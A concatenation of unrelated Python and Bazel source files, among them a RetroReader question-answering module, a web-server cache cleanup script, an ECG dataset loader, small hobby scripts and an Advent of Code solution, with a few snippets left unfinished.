output_dir: Optional[str] = None,
use_choice_logits: bool = False,
):
# Threshold-based Answerable Verification (TAV)
if len(predictions) not in [2, 3]:
raise ValueError(
"`predictions` should be a tuple with two or three elements "
"(start_logits, end_logits, choice_logits)."
)
all_start_logits, all_end_logits = predictions[:2]
all_choice_logits = None
if len(predictions) == 3:
all_choice_logits = predictions[-1]
# Build a map example to its corresponding features.
example_id_to_index = {k: i for i, k in enumerate(examples["guid"])}
features_per_example = collections.defaultdict(list)
for i, feature in enumerate(features):
features_per_example[example_id_to_index[feature["example_id"]]].append(i)
all_predictions = collections.OrderedDict()
all_nbest_json = collections.OrderedDict()
scores_diff_json = collections.OrderedDict() if version_2_with_negative else None
# Let's loop over all the examples!
for example_index, example in enumerate(tqdm(examples)):
# Those are the indices of the features associated to the current example.
feature_indices = features_per_example[example_index]
min_null_prediction = None
prelim_predictions = []
# Looping through all the features associated to the current example.
for feature_index in feature_indices:
# We grab the predictions of the model for this feature.
start_logits = all_start_logits[feature_index]
end_logits = all_end_logits[feature_index]
# score_null = s1 + e1
feature_null_score = start_logits[0] + end_logits[0]
if all_choice_logits is not None:
choice_logits = all_choice_logits[feature_index]
if use_choice_logits:
feature_null_score = choice_logits[1]
# This is what will allow us to map some the positions
# in our logits to span of texts in the original context.
offset_mapping = features[feature_index]["offset_mapping"]
# Optional `token_is_max_context`,
# if provided we will remove answers that do not have the maximum context
# available in the current feature.
token_is_max_context = features[feature_index].get("token_is_max_context", None)
# Update minimum null prediction.
if min_null_prediction is None or min_null_prediction["score"] > feature_null_score:
min_null_prediction = {
"offsets": (0, 0),
"score": feature_null_score,
"start_logit": start_logits[0],
"end_logit": end_logits[0],
}
# Go through all possibilities for the {top k} greater start and end logits
# top k = n_best_size if not beam_based else n_start_top, n_end_top
start_indexes = np.argsort(start_logits)[-1 : -n_best_size - 1 : -1].tolist()
end_indexes = np.argsort(end_logits)[-1 : -n_best_size - 1 : -1].tolist()
for start_index in start_indexes:
for end_index in end_indexes:
# Don't consider out-of-scope answers!
# either because the indices are out of bounds
# or correspond to part of the input_ids that are note in the context.
if (
start_index >= len(offset_mapping)
or end_index >= len(offset_mapping)
or offset_mapping[start_index] is None
or offset_mapping[end_index] is None
):
continue
# Don't consider answers with a length negative or > max_answer_length.
if end_index < start_index or end_index - start_index + 1 > max_answer_length:
continue
# Don't consider answer that don't have the maximum context available
# (if such information is provided).
if token_is_max_context is not None and not token_is_max_context.get(
str(start_index), False
):
continue
prelim_predictions.append(
{
"offsets": (offset_mapping[start_index][0], offset_mapping[end_index][1]),
"score": start_logits[start_index] + end_logits[end_index],
"start_logit": start_logits[start_index],
"end_logit": end_logits[end_index],
}
)
if version_2_with_negative:
# Add the minimum null prediction
prelim_predictions.append(min_null_prediction)
null_score = min_null_prediction["score"]
# Only keep the best `n_best_size` predictions
predictions = sorted(prelim_predictions, key=lambda x: x["score"], reverse=True)[:n_best_size]
# Add back the minimum null prediction if it was removed because of its low score.
if version_2_with_negative and not any(p["offsets"] == (0, 0) for p in predictions):
predictions.append(min_null_prediction)
# Use the offsets to gather the answer text in the original context.
context = example["context"]
for pred in predictions:
offsets = pred.pop("offsets")
pred["text"] = context[offsets[0] : offsets[1]]
# In the very rare edge case we have not a single non-null prediction,
# we create a fake prediction to avoid failure.
if len(predictions) == 0 or (len(predictions) == 1 and predictions[0]["text"] == ""):
predictions.insert(
0,
{
"text": "",
"start_logit": 0.0,
"end_logit": 0.0,
"score": 0.0,
},
)
# Compute the softmax of all scores
# (we do it with numpy to stay independent from torch/tf) in this file,
# using the LogSum trick).
scores = np.array([pred.pop("score") for pred in predictions])
exp_scores = np.exp(scores - np.max(scores))
probs = exp_scores / exp_scores.sum()
# Include the probabilities in our predictions.
for prob, pred in zip(probs, predictions):
pred["probability"] = prob
# Pick the best prediction. If the null answer is not possible, this is easy.
if not version_2_with_negative:
all_predictions[example["guid"]] = predictions[0]["text"]
else:
# Otherwise we first need to find the best non-empty prediction.
# print(i, len(predictions), type(predictions), predictions, predictions[0])
i = 0
while i < len(predictions) and predictions[i]["text"] == "": # i == 2, len(predictions)=2
i += 1
if i != len(predictions):
best_non_null_pred = predictions[i]
# Then we compare to the null prediction using the threshold.
score_diff = (
null_score - best_non_null_pred["start_logit"] - best_non_null_pred["end_logit"]
)
scores_diff_json[example["guid"]] = float(score_diff) # To be JSON-serializable.
if score_diff > null_score_diff_threshold:
all_predictions[example["guid"]] = ""
else:
all_predictions[example["guid"]] = best_non_null_pred["text"]
else:
scores_diff_json[example["guid"]] = float(null_score)
all_predictions[example["guid"]] = ""
# Make `predictions` JSON-serializable by casting np.float back to float.
all_nbest_json[example["guid"]] = [
{
k: (float(v) if isinstance(v, (np.float16, np.float32, np.float64)) else v)
for k, v in pred.items()
}
for pred in predictions
]
# If we have an output_dir, let's save all those dicts.
if output_dir is not None:
if not os.path.isdir(output_dir):
raise EnvironmentError(f"{output_dir} is not a directory.")
prediction_file = os.path.join(output_dir, "predictions.json")
nbest_file = os.path.join(output_dir, "nbest_predictions.json")
if version_2_with_negative:
null_odds_file = os.path.join(output_dir, "null_odds.json")
with open(prediction_file, "w") as writer:
writer.write(json.dumps(all_predictions, indent=4) + "\n")
with open(nbest_file, "w") as writer:
writer.write(json.dumps(all_nbest_json, indent=4) + "\n")
if version_2_with_negative:
with open(null_odds_file, "w") as writer:
writer.write(json.dumps(scores_diff_json, indent=4) + "\n")
return all_predictions, all_nbest_json, scores_diff_json, scores_diff_json
def predict(
self,
eval_dataset: Optional[Dataset] = None,
eval_examples: Optional[Dataset] = None,
ignore_keys: Optional[List[str]] = None,
metric_key_prefix: str = "predict",
) -> Dict[str, float]:
# memory metrics - must set up as early as possible
self._memory_tracker.start()
eval_dataset = self.eval_dataset if eval_dataset is None else eval_dataset
eval_dataloader = self.get_eval_dataloader(eval_dataset)
start_time = time.time()
eval_examples = self.eval_examples if eval_examples is None else eval_examples
compute_metrics = self.compute_metrics
self.compute_metrics = None
eval_loop = self.prediction_loop if self.args.use_legacy_prediction_loop else self.evaluation_loop
try:
output = eval_loop(
eval_dataloader,
description="Evaluation",
prediction_loss_only=True if compute_metrics is None else None,
ignore_keys=ignore_keys,
metric_key_prefix=metric_key_prefix,
)
finally:
self.compute_metrics = compute_metrics
if isinstance(eval_dataset, Dataset):
eval_dataset.set_format(
type=eval_dataset.format["type"],
columns=list(eval_dataset.features.keys()),
)
eval_preds = self.post_process_function(output, eval_examples, eval_dataset)
class RearVerifier:
def __init__(
self,
beta1: int = 1,
beta2: int = 1,
best_cof: int = 1,
):
self.beta1 = beta1
self.beta2 = beta2
self.best_cof = best_cof
def __call__(
self,
score_ext: Dict[str, float],
score_diff: Dict[str, float],
nbest_preds: Dict[str, Dict[int, Dict[str, float]]],
):
all_scores = collections.OrderedDict()
assert score_ext.keys() == score_diff.keys()
for key in score_ext.keys():
if key not in all_scores:
all_scores[key] = []
all_scores[key].append([self.beta1 * score_ext[key], self.beta2 * score_diff[key]])
output_scores = {}
for key, scores in all_scores.items():
mean_score = sum(scores) / float(len(scores))
output_scores[key] = mean_score
all_nbest = collections.OrderedDict()
for key, entries in nbest_preds.items():
if key not in all_nbest:
all_nbest[key] = collections.defaultdict(float)
for entry in entries:
prob = self.best_cof * entry["probability"]
all_nbest[key][entry["text"]] += prob
output_predictions = {}
for key, entry_map in all_nbest.items():
sorted_texts = sorted(entry_map.keys(), key=lambda x: entry_map[x], reverse=True)
best_text = sorted_texts[0]
output_predictions[key] = best_text
for qid in output_predictions.keys():
# if output_scores[qid] > thresh:
if output_scores[qid] > 1:
output_predictions[qid] = ""
return output_predictions, output_scores
class RetroReader:
def __init__(
self,
sketch_model_name_or_path="klue/roberta-large",
intensive_model_name_or_path="klue/roberta-large",
training_args=None,
data_args=None,
train_examples=None,
eval_examples=None,
test_examples=None,
tokenizer=None,
data_collator=None,
post_process_function=None,
# compute_metrics=None,
):
self.sketch_model_name_or_path = sketch_model_name_or_path
self.intensive_model_name_or_path = intensive_model_name_or_path
self.training_args = training_args
self.data_args = data_args
self.train_examples = train_examples
self.eval_examples = eval_examples
self.test_examples = test_examples
self.tokenizer = tokenizer
self.data_collator = data_collator
self.post_process_function = post_process_function
# self.compute_metrics = compute_metrics
if train_examples:
self.column_names = self.train_examples.column_names
else:
self.column_names = self.eval_examples.column_names
self.mrc_processor = DataProcessor(
data_args=data_args,
training_args=training_args,
tokenizer=tokenizer,
column_names=self.column_names,
)
self.init_module("sketch")
self.init_module("intensive")
self.rear_verifier = RearVerifier()
def __call__(
self,
query: str,
context: Union[str, List[str]],
):
if isinstance(context, list):
context = " ".join(context)
predict_examples = Dataset.from_dict(
{"example_id": ["0"], "question": [query], "context": [context], "guid": ["0"]}
)
sketch_features = predict_examples.map(
self.mrc_processor.prepare_test_features_for_sketch_reader,
batched=True,
remove_columns=predict_examples.column_names,
)
intensive_features = predict_examples.map(
self.mrc_processor.prepare_test_features_for_intensive_reader,
batched=True,
remove_columns=predict_examples.column_names,
)
# self,
# predict_dataset: Dataset,
# predict_examples: Dataset,
# ignore_keys: Optional[List[str]] = None,
# metric_key_prefix: str = "test",
score_ext = self.sketch_reader.predict(
predict_dataset=predict_examples, predict_examples=sketch_features
)
_, nbest_preds, score_diff, _ = self.intensive_reader.predict(
# _, nbest_preds, score_diff, _ = self.intensive_reader.post_process_function(
predict_dataset=predict_examples,
predict_examples=intensive_features,
)
predictions, scores = self.rear_verifier(score_ext, score_diff, nbest_preds)
return predictions, scores
def predict(self):
self.sketch_reader.evaluate()
self.intensive_reader.evaluate()
def train(self):
# sketch_reader_result = self.sketch_reader.evaluate()
# intensive_reader_result = self.intensive_reader.evaluate()
# ------------------------------------------------------
sketch_reader_result = self.sketch_reader.train()
# self.save_and_log(self.sketch_reader, sketch_reader_result, module_name="sketch")
intensive_reader_result = self.intensive_reader.train()
# self.save_and_log(self.intensive_reader, intensive_reader_result, module_name="intensive")
def preprocess_examples(self, module_name="sketch"):
with self.training_args.main_process_first(
desc=f"train dataset for {module_name} reader map pre-processing"
):
train_dataset = None
with self.training_args.main_process_first(
desc=f"validation dataset for {module_name} reader map pre-processing"
):
eval_dataset = self.eval_examples.map(
self.mrc_processor.prepare_eval_features_for_sketch_reader
if module_name == "sketch"
else self.mrc_processor.prepare_eval_features_for_intensive_reader,
batched=True,
num_proc=self.data_args.preprocessing_num_workers,
remove_columns=self.column_names,
load_from_cache_file=not self.data_args.overwrite_cache,
desc=f"Running tokenizer on validation dataset for {module_name} reader",
)
return train_dataset, eval_dataset
def init_module(self, module_name="sketch"):
if module_name == "sketch":
sketch_reader_config = AutoConfig.from_pretrained(self.sketch_model_name_or_path, num_labels=2)
sketch_reader_model = RobertaForSequenceClassification.from_pretrained(
self.sketch_model_name_or_path, config=sketch_reader_config
)
(
self.train_dataset_for_sketch_reader,
self.eval_dataset_for_sketch_reader,
) = self.preprocess_examples(module_name="sketch")
def compute_metrics_for_sketch_reader(p: EvalPrediction):
labels = p.label_ids
preds = p.predictions.argmax(-1)
f1 = f1_score(labels, preds)
acc = accuracy_score(labels, preds)
return {"f1": f1, "accuracy": acc}
# self.training_args.metric_for_best_model = self.data_args.load_best_model_at_end_sketch_reader
# self.training_args.load_best_model_at_end = True
sketch_reader_args = copy(self.training_args)
sketch_reader_args.metric_for_best_model = "eval_f1"
sketch_reader_args.output_dir = "sketch_reader_outputs"
self.sketch_reader = SketchReader(
model=sketch_reader_model,
args=sketch_reader_args,
train_dataset=self.train_dataset_for_sketch_reader if self.training_args.do_train else None,
eval_dataset=self.eval_dataset_for_sketch_reader if self.training_args.do_eval else None,
eval_examples=self.eval_examples if self.training_args.do_eval else None,
tokenizer=self.tokenizer,
data_collator=self.data_collator,
# post_process_function=self.mrc_processor.post_processing_function,
compute_metrics=compute_metrics_for_sketch_reader,
)
elif module_name == "intensive":
intensive_reader_config = AutoConfig.from_pretrained(self.intensive_model_name_or_path)
# intensive_reader_model = RobertaForQuestionAnsweringAVPool.from_pretrained(
intensive_reader_model = RobertaCNNForQuestionAnsweringAVPool.from_pretrained(
self.intensive_model_name_or_path, config=intensive_reader_config
)
(
self.train_dataset_for_intensive_reader,
self.eval_dataset_for_intensive_reader,
) = self.preprocess_examples(module_name="intensive")
def compute_metrics(p: EvalPrediction):
metric = load_metric("squad_v2")
return metric.compute(predictions=p.predictions, references=p.label_ids)
# self.training_args.metric_for_best_model = self.data_args.load_best_model_at_end_intensive_reader
# self.training_args.metric_for_best_model = "eval_exact"
intensive_reader_args = copy(self.training_args)
intensive_reader_args.metric_for_best_model = "eval_exact"
intensive_reader_args.output_dir = "intensive_reader_outputs"
self.intensive_reader = IntensiveReader(
model=intensive_reader_model,
args=intensive_reader_args,
data_args=self.data_args,
train_dataset=self.train_dataset_for_intensive_reader
if self.training_args.do_train
else None,
eval_dataset=self.eval_dataset_for_intensive_reader if self.training_args.do_eval else None,
eval_examples=self.eval_examples if self.training_args.do_eval else None,
tokenizer=self.tokenizer,
data_collator=self.data_collator,
# post_process_function=self.mrc_processor.post_processing_function,
compute_metrics=compute_metrics,
)
def save_and_log(self, reader, result, module_name="sketch"):
reader.save_model()
metrics = result.metrics
max_train_samples = (
self.data_args.max_train_samples
if self.data_args.max_train_samples is not None
else len(self.train_examples)
)
metrics["train_samples"] = min(max_train_samples, len(self.train_examples))
reader.log_metrics("train", metrics)
reader.save_metrics("train", metrics)
reader.save_state()
metrics = reader.evaluate(
eval_dataset=self.eval_dataset_for_sketch_reader
if module_name == "sketch"
else self.eval_dataset_for_intensive_reader,
eval_examples=self.eval_examples,
)
print(metrics)
max_eval_samples = (
self.data_args.max_eval_samples
if self.data_args.max_eval_samples is not None
else len(self.eval_examples)
)
metrics["eval_samples"] = min(max_eval_samples, len(self.eval_examples))
reader.log_metrics("eval", metrics)
reader.save_metrics("eval", metrics)
|
#!/usr/bin/env python3
import turtle as t
import random as r
title = 'Rainbow Circle'
t.title(title)
t.showturtle()
t.colormode(255)
t.speed(0)
t.width(3)
def circle():
x = 1
if x == 1:
while x == 1:
t.color(r.randrange(0,255),r.randrange(0,255),r.randrange(0,255))
t.begin_fill()
t.forward(2)
t.left(1)
t.end_fill()
elif x == 0:
print('Failed to loop')
else:
print('Fatal Error! Please Reinstall.')
circle()
|
#!/usr/bin/env python
import sys
import os
import sqlite3
import shutil
import argparse
import fcntl
from datetime import datetime
from pytz import timezone
import tempfile
from libpredweb import myfunc
from libpredweb import webserver_common as webcom
TZ = webcom.TZ
progname = os.path.basename(sys.argv[0])
rootname_progname = os.path.splitext(progname)[0]
def clean_cached_result(MAX_KEEP_DAYS, g_params): # {{{
"""Clean out-dated cached result"""
path_log = g_params['path_log']
path_cache = g_params['path_cache']
logfile = f"{path_log}/{progname}.log"
errfile = f"{path_log}/{progname}.err"
db = f"{path_log}/cached_job_finished_date.sqlite3"
tmpdb = tempfile.mktemp(prefix=f"{db}_")
webcom.loginfo(f"copy db {db} to tmpdb {tmpdb}", logfile)
try:
shutil.copyfile(db, tmpdb)
except OSError:
webcom.loginfo(f"Failed to copy {db} to {tmpdb}.", errfile)
return 1
md5listfile = f"{path_log}/cache_to_delete.md5list"
con = sqlite3.connect(tmpdb)
webcom.loginfo(f"output the outdated md5 list to {md5listfile}", logfile)
tablename = "data"
with con:
cur = con.cursor()
fpout = open(md5listfile, "w")
nn_mag = cur.execute(f"SELECT md5, date_finish FROM {tablename}")
cnt = 0
chunk_size = 1000
while True:
result = nn_mag.fetchmany(chunk_size)
if not result:
break
else:
for row in result:
cnt += 1
md5_key = row[0]
finish_date_str = row[1]
finish_date = webcom.datetime_str_to_time(finish_date_str)
current_time = datetime.now(timezone(TZ))
timeDiff = current_time - finish_date
if timeDiff.days > MAX_KEEP_DAYS:
fpout.write(f"{md5_key}\n")
fpout.close()
# delete cached result folder and delete the record
webcom.loginfo("Delete cached result folder and delete the record", logfile)
hdl = myfunc.ReadLineByBlock(md5listfile)
lines = hdl.readlines()
cnt = 0
while lines is not None:
for line in lines:
line = line.strip()
if line != "":
cnt += 1
md5_key = line
subfoldername = md5_key[:2]
cachedir = os.path.join(path_cache, subfoldername, md5_key)
zipfile_cache = cachedir + ".zip"
if os.path.exists(zipfile_cache):
try:
os.remove(zipfile_cache)
webcom.loginfo(f"rm {zipfile_cache}", logfile)
cmd_d = f"DELETE FROM {tablename} WHERE md5 = '{md5_key}'"
cur.execute(cmd_d)
except Exception as e:
webcom.loginfo(f"Failed to delete with errmsg {e}", errfile)
pass
lines = hdl.readlines()
hdl.close()
webcom.loginfo(f"VACUUM the database {tmpdb}", logfile)
cur.execute("VACUUM")
# copy back
webcom.loginfo(f"cp tmpdb {tmpdb} -> db {db}", logfile)
try:
shutil.copyfile(tmpdb, db)
except Exception as e:
webcom.loginfo(f"Failed to copy {tmpdb} to {db} with {e}", errfile)
return 1
webcom.loginfo(f"delete tmpdb {tmpdb}", logfile)
try:
os.remove(tmpdb)
except Exception as e:
webcom.loginfo(f"Failed to delete {tmpdb} with {e}", errfile)
return 1
return 0
# }}}
def main(): # {{{
"""main procedure"""
parser = argparse.ArgumentParser(
description='Clean outdated cached results',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=f'''\
Created 2018-10-21, updated 2022-03-10, Nanjiang Shu
Examples:
{progname} -max-keep-day 360
''')
parser.add_argument('-i', metavar='JSONFILE', dest='jsonfile',
type=str, required=True,
help='Provide the Json file with all parameters')
parser.add_argument('-max-keep-day', metavar='INT', dest='max_keep_days',
default=360, type=int, required=False,
help='The age of the cached result to be kept,\
(default: 360)')
args = parser.parse_args()
MAX_KEEP_DAYS = args.max_keep_days
jsonfile = args.jsonfile
if not os.path.exists(jsonfile):
print(f"Jsonfile {jsonfile} does not exist. Exit {progname}!",
file=sys.stderr)
return 1
g_params = {}
g_params.update(webcom.LoadJsonFromFile(jsonfile))
lockname = f"{rootname_progname}.lock"
lock_file = os.path.join(g_params['path_log'], lockname)
fp = open(lock_file, 'w')
try:
fcntl.lockf(fp, fcntl.LOCK_EX | fcntl.LOCK_NB)
except IOError:
webcom.loginfo(f"Another instance of {progname} is running",
g_params['gen_logfile'])
return 1
status = clean_cached_result(MAX_KEEP_DAYS, g_params)
if os.path.exists(lock_file):
try:
os.remove(lock_file)
except OSError:
webcom.loginfo(f"Failed to delete lock_file {lock_file}",
g_params['gen_logfile'])
return status
if __name__ == '__main__':
sys.exit(main())
|
'''
Randomly show files under specific path
07.12.2019
@chenz
'''
import FileDirectory as fd
import Show as sh
import random
import sys
import argparse
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
def main():
# Process Parameters
parser = argparse.ArgumentParser(description='Setup Parameters')
parser.add_argument('--iters', default=1, type=int, help='Number of files to show')
parser.add_argument('--interval', default=0, type=float, help='Show time for each file')
parser.add_argument('--path', default='', type=str, help='Path for searching files')
parser.add_argument('--type', default='IMG', type=str, help='Type of file for search, currently spports IMG, JPG/JPEG, PNG')
parser.add_argument('--sysImgApp', default=0, type=int, help='Selection for use system application to open image or matplotlib')
args = parser.parse_args()
if args.path:
file_list = fd.genAllFileDir(args.path)
if args.type == 'IMG':
file_list = fd.getImage(file_list)
sh.showImage(file_list, iters=args.iters, interval=args.interval, sysImgApp=args.sysImgApp)
elif args.type == 'JPG' or args.type == 'JPEG':
file_list = fd.getJPG(file_list)
sh.showImage(file_list, iters=args.iters, interval=args.interval, sysImgApp=args.sysImgApp)
elif args.type == 'PNG':
file_list = fd.getPNG(file_list)
sh.showImage(file_list, iters=args.iters, interval=args.interval, sysImgApp=args.sysImgApp)
elif args.type == 'Video':
file_list = fd.getVideo(file_list)
sh.showVideo(file_list)
elif args.type == 'Any':
sh.openAny(file_list)
else:
print('TODO')
# TODO
if __name__ == "__main__":
main()
|
import argparser
class Spotify():
# We want to get an URL from the command terminal (argparser)
# We need to make sure this is a playlist and contains music.
# For each of the songs, look it up in Spotify.
# Create a playlist in spotify
# Add the youtube playlist to the spotify playlist.
def main():
if __name__ == __main__:
spotify = Spotify()
s.main() |
# Python Standard Library Imports
import re
class Re(object):
def __init__(self):
self.last_match = None
def match(self, pattern, text):
if type(pattern).__name__ == 'SRE_Pattern':
self.last_match = pattern.match(text)
else:
self.last_match = re.match(pattern, text)
return self.last_match
def search(self, pattern, text):
if type(pattern).__name__ == 'SRE_Pattern':
self.last_match = pattern.search(text)
else:
self.last_match = re.search(pattern, text)
return self.last_match
def sub(self, pattern, repl, string, count=0, flags=0):
def frepl(matchobj):
self.last_match = matchobj
return repl
if type(pattern).__name__ == 'SRE_Pattern':
result, n = pattern.subn(frepl, string, count=count)
else:
result, n = re.subn(pattern, frepl, string, count=count, flags=flags)
if n == 0:
self.last_match = None
return result
|
import pygatt
import logging
logging.basicConfig()
logging.getLogger('pygatt').setLevel(logging.DEBUG)
adapter = pygatt.BGAPIBackend()
try:
adapter.start()
finally:
adapter.stop()
|
#!/usr/bin/env python
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# Jiao Lin
# California Institute of Technology
# (C) 2007 All Rights Reserved
#
# {LicenseText}
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
from mcni.components.NeutronPrinter import NeutronPrinter as enginefactory, category
from mcni.pyre_support.AbstractComponent import AbstractComponent
class NeutronPrinter( AbstractComponent ):
__doc__ = enginefactory.__doc__
class Inventory( AbstractComponent.Inventory ):
import pyre.inventory as pinv
def process(self, neutrons):
return self.engine.process( neutrons )
def _configure(self):
AbstractComponent._configure(self)
return
def _init(self):
AbstractComponent._init(self)
self.engine = enginefactory( self.name )
return
pass # end of Source
# version
__id__ = "$Id$"
# End of file
|
# load("@io_bazel_rules_dotnet//dotnet:defs.bzl", "core_library", "core_resx")
# core_resx(
# name = "core_resource",
# src = "src/TestFramework/MSTest.Core/Resources/FrameworkMessages.resx",
# identifier = "Microsoft.VisualStudio.TestTools.UnitTesting.Resources.FrameworkMessages.resources",
# )
# core_library(
# name = "MSTest.Core.dll",
# srcs = glob(["testfx/src/TestFramework/MSTest.Core/**/*.cs"]) + glob([
# "testfx/src/TestFramework/Extension.Shared/**/*.cs",
# ]) + [
# "//testfx:Friends.cs",
# ],
# defines = [
# ],
# keyfile = "//testfx:testfx.snk",
# resources = [":core_resource"],
# visibility = ["//visibility:public"],
# deps = [
# ":Extension.Core.dll",
# "@core_sdk_stdlib//:libraryset",
# ],
# )
# core_library(
# name = "Extension.Core.dll",
# srcs = glob(["src/TestFramework/Extension.Core/**/*.cs"]),
# defines = [
# ],
# keyfile = "@rules_dotnet_3rd_party//testfx:testfx.snk",
# visibility = ["//visibility:public"],
# deps = [
# "@core_sdk_stdlib//:libraryset",
# ],
# )
# core_library(
# name = "PlatformServices.Interface.dll",
# srcs = glob(["testfx/src/Adapter/PlatformServices.Interface/**/*.cs"]),
# defines = [
# ],
# keyfile = "//testfx:testfx.snk",
# visibility = ["//visibility:public"],
# deps = [
# ":Extension.Core.dll",
# ":MSTest.Core.dll",
# "//vstest:Microsoft.VisualStudio.TestPlatform.ObjectModel.dll",
# "@core_sdk_stdlib//:libraryset",
# ],
# )
# core_library(
# name = "PlatformServices.Portable.dll",
# srcs = glob(["testfx/src/Adapter/PlatformServices.Portable/**/*.cs"]) + glob([
# "testfx/src/Adapter/PlatformServices.Shared/netstandard1.0/Services/**/*.cs",
# ]) + [
# "testfx/src/Adapter/PlatformServices.Shared/netstandard1.0/Constants.cs",
# ],
# defines = [
# ],
# keyfile = "//testfx:testfx.snk",
# visibility = ["//visibility:public"],
# deps = [
# ":PlatformServices.Interface.dll",
# ],
# )
# core_resx(
# name = "adapter_resource",
# src = "testfx/src/Adapter/MSTest.CoreAdapter/Resources/Resource.resx",
# identifier = "Microsoft.VisualStudio.TestPlatform.MSTest.TestAdapter.Resources.Resource.resources",
# )
# core_library(
# name = "Microsoft.VisualStudio.TestPlatform.MSTest.TestAdapter.dll",
# srcs = glob(
# ["testfx/src/Adapter/MSTest.CoreAdapter/**/*.cs"],
# exclude = ["testfx/src/Adapter/MSTest.CoreAdapter/Execution/TestContextImpl.cs"],
# ),
# defines = [
# ],
# keyfile = "//testfx:testfx.snk",
# resources = [
# ":adapter_resource",
# ],
# visibility = ["//visibility:public"],
# deps = [
# ":PlatformServices.Portable.dll",
# ],
# )
|
import ox3apiclient
import logging
import requests
import json
import report_config
ox = ox3apiclient.client_from_file().logon()
ox.logger.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
ox.logger.addHandler(ch)
# YOUR SETTINGS LOADED FROM 'report_config.py' file
date_range = report_config.date_range
report = ox.post('/date-range/', data=json.dumps(date_range));
|
from typing import Optional
import xml.etree.ElementTree as ET
from ...xml.XmlReader import XmlReader as XR
from ..namespaces import API
from ..namespaces import DATA
from ...deserialization.create_enum import create_enum
from ..dto.AnnulmentData import AnnulmentData
from ..dto.AnnulmentVerificationStatus import AnnulmentVerificationStatus
def deserialize_annulment_data(element: ET.Element) -> Optional[AnnulmentData]:
if element is None:
return None
result = AnnulmentData(
annulment_verification_status=create_enum(AnnulmentVerificationStatus, XR.get_child_text(element, 'annulmentVerificationStatus', API)),
annulment_decision_date=XR.get_child_datetime(element, 'annulmentDecisionDate', API),
annulment_decision_user=XR.get_child_text(element, 'annulmentDecisionUser', API),
)
return result
|
# -*- coding: utf-8 -*-
# --- part one ---
def parse_inputs(file):
with open(file, "r") as f:
inputs = f.readlines()
state = inputs[0].rstrip().split("initial state: ")[1]
rules = [line.rstrip() for line in inputs[2:]]
return state, rules
state, rules = parse_inputs("input.txt")
rules = {r[0]: r[1] for r in [rule.split(" => ") for rule in rules]}
def spread_plant_nearby(state, rules, origin):
state = f".....{state}....."
origin += -3 # -5 for the dots and +2 because we loop from the 3rd element
new_state = []
for position in range(2, len(state) - 2):
rule = state[position - 2 : position + 3]
spread = rules[rule]
new_state.append(spread)
while new_state[0] == ".":
new_state.pop(0)
origin += 1
while new_state[-1] == ".":
new_state.pop()
return "".join(new_state), origin
def sum_position(state, origin):
return sum(idx + origin for idx, plot in enumerate(state) if plot == "#")
origin = 0
for generation in range(1, 21):
state, origin = spread_plant_nearby(state, rules=rules, origin=origin)
print(f"The answer of part 1 is: {sum_position(state, origin)}")
# --- part two ---
state, rules = parse_inputs("input.txt")
rules = {r[0]: r[1] for r in [rule.split(" => ") for rule in rules]}
N = 50_000_000_000
origin = 0
previous_filled_pots = 0
for generation in range(1, N):
new_state, origin = spread_plant_nearby(state, rules=rules, origin=origin)
filled_pots = sum_position(new_state, origin)
delta = filled_pots - previous_filled_pots
if new_state == state:
break
state = new_state
previous_filled_pots = filled_pots
result = (N - generation) * delta + filled_pots
print(f"The answer of part 2 is: {result}")
|
import pandas as pd
import numpy as np
from os import listdir
from os.path import isfile,join
import torch
import wfdb
from torch.utils import data
bit_per_sample = 11 # not used
freq = 360 # samples in sec - not used
SAMPLE_SIZE = 127
default_path_company = r'..\..\Data\MIT_BIH_CSV'
NUM_of_windows = {
4096: 158,
2048: 316
}
class Dataset(data.Dataset):
'''
Characterizes a dataset for PyTorch
'''
def __init__(self, list_IDs, labels, typecast='float32',Normalize_scale=(0,1),WINDOW_SIZE=4096):
'Initialization'
self.labels = labels
ranges = [(x*WINDOW_SIZE, (x+1)*WINDOW_SIZE) for x in range(NUM_of_windows[WINDOW_SIZE])]
self.final_dataset = []
for file_name in list_IDs:
single_list = [(file_name,range) for range in ranges]
self.final_dataset += single_list
print('MIT_BIH_loader initialized')
self.norm_scale = Normalize_scale
self.WINDOW_SIZE = WINDOW_SIZE
def __len__(self):
'Denotes the total number of samples'
return len(self.final_dataset)
def __getitem__(self, index):
'Generates one sample of data'
# Select sample
file_name, range = self.final_dataset[index]
sempfrom,sempto = range
# Load data and get label
X, y = load_data(file_name, sempfrom, sempto)
X = torch.from_numpy(np.array(X)).float()
if type(self.norm_scale) == type((0, 1)):
X = (X - torch.min(X)) / (torch.max(X) - torch.min(X)) * (self.norm_scale[1] - self.norm_scale[0]) + \
self.norm_scale[0]
y = torch.from_numpy(np.array(y)).int()
return X, y, file_name,sempfrom
def load_data(data__dir_path, offset=0, sampto='end'):
only_files = [data__dir_path]
if not isfile(data__dir_path):
only_files = [join(data__dir_path, f) for f in listdir(data__dir_path) if isfile(join(data__dir_path, f))]
data_arr = np.array([])
anotation_arr = np.array([])
for idx, file_path in enumerate(only_files):
file_path = file_path.split('.')[0]
signals, _ = wfdb.rdsamp(file_path, sampfrom=offset, sampto=sampto)
data_file = signals[:,0] # ['\'V5\''] another option
data_arr = np.concatenate((data_arr, data_file))
try:
annotation_file = wfdb.rdann(file_path, 'atr', sampfrom=offset, sampto=sampto).sample - offset
anotation_arr = np.concatenate((anotation_arr, annotation_file.astype('int32')))
except Exception as e:
print(str(e))
if idx % 10 == 0 and idx > 0:
print((0.0+idx)/len(only_files))
return data_arr, anotation_arr
|
import sys
import timeit
import unicodedata
import numpy as np
UNICODE_NSM = [
"\u0300",
"\u0301",
"\u0302",
"\u0303",
"\u0304",
"\u0305",
"\u0306",
"\u0307",
"\u0308",
"\u0309",
"\u030A",
"\u030B",
"\u030C",
"\u030D",
"\u030E",
"\u030F",
"\u0310",
"\u0311",
"\u0312",
"\u0313",
"\u0314",
"\u0315",
"\u0316",
"\u0317",
"\u0318",
"\u0319",
"\u031A",
"\u031B",
"\u031C",
"\u031D",
"\u031E",
"\u031F",
"\u0320",
"\u0321",
"\u0322",
"\u0323",
"\u0324",
"\u0325",
"\u0326",
"\u0327",
"\u0328",
"\u0329",
"\u032A",
"\u032B",
"\u032C",
